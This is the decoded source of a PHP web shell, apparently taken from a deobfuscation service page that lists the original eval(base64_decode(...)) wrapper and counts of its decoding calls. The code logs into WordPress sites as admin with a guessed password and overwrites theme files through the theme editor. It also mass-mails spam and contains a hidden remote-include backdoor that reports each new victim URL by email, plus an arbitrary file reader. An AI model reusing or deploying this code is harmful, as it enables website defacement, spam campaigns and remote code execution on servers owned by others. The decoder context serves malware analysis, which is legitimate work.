$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
$pos = strpos($buffer,"admin");
if($pos === false) {
echo("<br>[-] Login Error");
exit;
}
else {
echo("<br>[+] Login Successful");
}
echo("<br>[*] Theme editor ...");
$url2=$site_url."/wp-admin/theme-editor.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
$ar=explode( '<li><a href="theme-editor.php?file=', $buffer);
for($vi=0;$vi < count($ar);$vi++)
{
if(substr_count($ar[$vi],"(index.php)") != 0){
$theme=entre2v2($ar[$vi],'/themes','">');
// echo(entre2v2($ar[$vi],'/themes','">'));
}
}
if($theme) {
echo("<br>[+] index.php file founded in Theme Editor");
}
else {
echo("<br>[-] index.php Not found in Theme Editor");
exit;
}
echo("<br>[*] Updating Index.php .....");
//-----------------------------------------------------$theme=str_replace("&","&",$theme);
$url2=trim($site_url."/wp-admin/theme-editor.php?file=/themes".$theme);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
//echo($buffer0);
$_wpnonce=entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file=entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
$url2=$site_url."/wp-admin/theme-editor.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$h."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
//echo($buffer);
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
echo("<br>[-] Updating Index.php Error");
exit;
}
else {
echo("<br>[+] Index.php Updated Successfuly");
}
//////////////////////////////
$ar=explode( '<li><a href="theme-editor.php?file=', $buffer);
for($vi=0;$vi < count($ar);$vi++)
{
if(substr_count($ar[$vi],"(home.php)") != 0){
$theme=entre2v2($ar[$vi],'/themes','">');
// echo(entre2v2($ar[$vi],'/themes','">'));
}
}
if($theme) {
echo("<br>[+] home.php file founded in Theme Editor");
}
else {
echo("<br>[-] home.php Not found in Theme Editor");
exit;
}
echo("<br>[*] Updating home.php .....");
//-----------------------------------------------------$theme=str_replace("&","&",$theme);
$url2=trim($site_url."/wp-admin/theme-editor.php?file=/themes".$theme);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
//echo($buffer0);
$_wpnonce=entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file=entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
$url2=$site_url."/wp-admin/theme-editor.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$h."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
//echo($buffer);
$pos = strpos($buffer,'<div id="message" class="updated">');
if($pos === false) {
echo("<br>[-] Updating home.php Error");
exit;
}
else {
echo("<br>[+] home.php Updated Successfuly");
}
}
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}
?>
<body bgcolor="#000000">
<style>
BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive;}
textarea{background-color:#191919;color:white;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
</style>
<center>
<font color="#cecece" size='3' face="Century Gothic"><b>Wordpress Index Changer</b><font><br>
</center>
<FORM action="" method="post">
<input type="hidden" name="form_action" value="2">
<br>
<center><table border=0>
<tr><td>db_prefix </td><td><input type="text" size="30" name="db_prefix" value="wp_"></td></tr>
<tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
<tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
<tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""></td></tr>
</table></center>
<br>
<br><center>
<TEXTAREA rows="18" cols="50" name="code">
Your index
</TEXTAREA>
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</center>
</FORM>
<?php
//
break;
case"base64";
echo '
<center><td width="569" height="423" align="center" valign="top" font="tahoma" >
<span>
<script type="text/javascript"><!--
var keyStr = "ABCDEFGHIJKLMNOP" +
"QRSTUVWXYZabcdef" +
"ghijklmnopqrstuv" +
"wxyz0123456789+/" +
"=";
function encode64(input) {
input = escape(input);
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
do {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
keyStr.charAt(enc1) +
keyStr.charAt(enc2) +
keyStr.charAt(enc3) +
keyStr.charAt(enc4);
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
} while (i < input.length);
return output;
}
function decode64(input) {
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
var base64test = /[^A-Za-z0-9\+\/\=]/g;
if (base64test.exec(input)) {
alert("There were invalid base64 characters in the input text.
" +
"Valid base64 characters are A-Z, a-z, 0-9, \'\+\'\, \'\/\'\, and \'\=\'
" +
"Expect errors in decoding.");
}
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
} while (i < input.length);
return unescape(output);
}
//-->
</script>
<body>
<form name="base64Form">
<p> <br>
<textarea name="theText" cols="40" rows="10" style="border:3px double #478AB1; color: #000000; background-color: #C0C0C0"></textarea><br>
<input type="button" name="encode" value="Encode"
onClick="document.base64Form.theText.value=encode64(document.base64Form.theText.value);" style="border:3px double #FF0000; font-family: Tahoma, Geneva, sans-serif; font-size: 10px; font-weight: bold; color: #C0C0C0; background: #000000">
<input type="button" name="decode" value="Decode"
onClick="document.base64Form.theText.value=decode64(document.base64Form.theText.value);" style="border:3px double #478AB1; font-family: Tahoma, Geneva, sans-serif; font-size: 10px; font-weight: bold; color: #C0C0C0; background: #000000">
</p>
</form>';
break;
case "md5";
echo '
<br />
<center><font color="#c0c0c0" size="5" face="Century Gothic">MD5 Crypter</font></center>
<br /><br /><br />
<center>
<form method="post">
<INPUT size="35" value="" name="pass" type="text">
<INPUT value="crypt" name="send" type="submit">
</center>
</form><br />
';
if (empty($_POST['pass']))
echo ('');
else
echo "<center><font color='#00FF00'>".md5($_POST['pass'])."</font> = ".$_POST['pass']."</center>";
echo '<br /><br /><center><font face="Century Gothic" size="3" color="red">MR@T0RJAN</font></center>';
break;
case "spam";
$secure = "";
error_reporting(0);
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
?>
<html>
<head>
</head>
<body>
<?php
If ($action=="mysql"){
//Grab email addresses from MySQL
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."
";
}
}
if ($action=="send"){ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
<table width="142" border="0">
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<?php print $from; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<?php print $realname; ?>" size="30" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="24" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
</div>
</td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="90" />
</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
</td>
<td width="278">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
<input type="radio" name="contenttype" value="plain" /> Plain
<input type="radio" name="contenttype" value="html" checked="checked" /> HTML
<input type="hidden" name="action" value="send" /><br />
Number to send: <input type="text" name="amount" value="1" size="10" /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
<input type="submit" value="Send eMails" />
</font>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
</form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("
", $emaillist);
$numemails = count($allemails);
$filter = "maillist";
$float = "From : mailist info <[email protected]>";
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>
Reply-To: $replyto
";
$header .= "MIME-Version: 1.0
";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid
";
If ($file_name) $header .= "--$uid
";
$header .= "Content-Type: text/$contenttype
";
$header .= "Content-Transfer-Encoding: 8bit
";
$header .= "$message
";
If ($file_name) $header .= "--$uid
";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"
";
If ($file_name) $header .= "Content-Transfer-Encoding: base64
";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"
";
If ($file_name) $header .= "$content
";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
}
?>
<?
if (trim($_GET['x'])!=''){@include($_GET['x']);exit();}$email = '';$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];@mail($email, 'Exploit: '. $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: '. $y .'
You can use (x=shell_url) at the end of the link ;) ', 'From: '. $email .' <'. $email .'>
');
?>
<?php
$i=$_GET['i'];
print file_get_contents($i);
exit;
?>
</body>
</html>
<?php
}
Did this file decode correctly?
Original Code
<?php
eval(gzuncompress(str_rot13(base64_decode(''))));
?>
Function Calls
strrev | 6 |
gzinflate | 20 |
str_rot13 | 18 |
gzuncompress | 8 |
rawurldecode | 2 |
base64_decode | 34 |
Stats
MD5 | 07ff69a2476a441aefed968636eb310c |
Eval Count | 30 |
Decode Time | 1790 ms |